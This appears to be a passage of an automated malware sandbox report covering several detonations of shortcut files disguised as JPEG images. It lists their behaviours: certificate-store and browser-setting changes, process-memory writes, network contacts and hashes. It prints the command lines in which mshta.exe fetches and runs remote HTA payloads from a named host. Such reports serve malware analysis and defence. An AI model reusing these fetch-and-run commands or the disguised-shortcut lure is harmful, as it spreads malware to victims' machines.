ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2004 wrote to memory of 1040 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 2004 wrote to memory of 1040 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 2004 wrote to memory of 1040 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\Image-8646-ZP.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Bn-Offrs-Album/Image-8646-ZP

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/2004-54-0x000007FEFB9B1000-0x000007FEFB9B3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220310-en

Max time kernel

297s

Max time network

1218s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20201210342791.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 972 wrote to memory of 392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 972 wrote to memory of 392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 972 wrote to memory of 392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20201210342791.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image3

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.30.182:80 crl.comodoca.com tcp

Files

memory/972-54-0x000007FEFBA61000-0x000007FEFBA63000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220311-en

Max time kernel

301s

Max time network

1218s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210743209813.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1924 wrote to memory of 1168 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1924 wrote to memory of 1168 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1924 wrote to memory of 1168 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1168 wrote to memory of 572 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 1168 wrote to memory of 572 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 1168 wrote to memory of 572 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210743209813.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image6

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\ProgramData\Duolingo\windate.hta

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/1924-54-0x000007FEFBDE1000-0x000007FEFBDE3000-memory.dmp

memory/1168-92-0x00000000031A0000-0x00000000031A8000-memory.dmp

memory/1168-94-0x000000001CF37000-0x000000001CF38000-memory.dmp

memory/1168-93-0x000007FEF3B00000-0x000007FEF44EC000-memory.dmp

C:\ProgramData\Duolingo\windate.hta

MD5 df0ae835a1dc249c25f56c96a19c63c7
SHA1 388bb0c49057b08a6fc5e7d4fcaab18754650c59
SHA256 7838794872d83079d1a912e0201a76aff8b42404dde2117a5c57a3bb3310d1df
SHA512 d4f538231d4c67407778dbfa6d825c53e59ce70e11a9d8add0e47ee248c0d8b5053285f197e9259af24898e15178a600f5bf852ef3a98258c61c9c67a9898aa8

Analysis: behavioral18

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:57

Platform

win10v2004-en-20220113

Max time kernel

687s

Max time network

706s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210918232755.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4092 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 4092 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210918232755.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image8

C:\Windows\System32\Upfc.exe

C:\Windows\System32\Upfc.exe /launchtype periodic /cv qOrySqqg3UO7OZZjpngqrw.0

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.31.182:80 crl.usertrust.com tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
NL 104.110.191.140:80 tcp

Files

memory/1524-131-0x0000017A4A910000-0x0000017A4B3D1000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220310-en

Max time kernel

299s

Max time network

1220s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20201220_211940.jpg.lnk

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca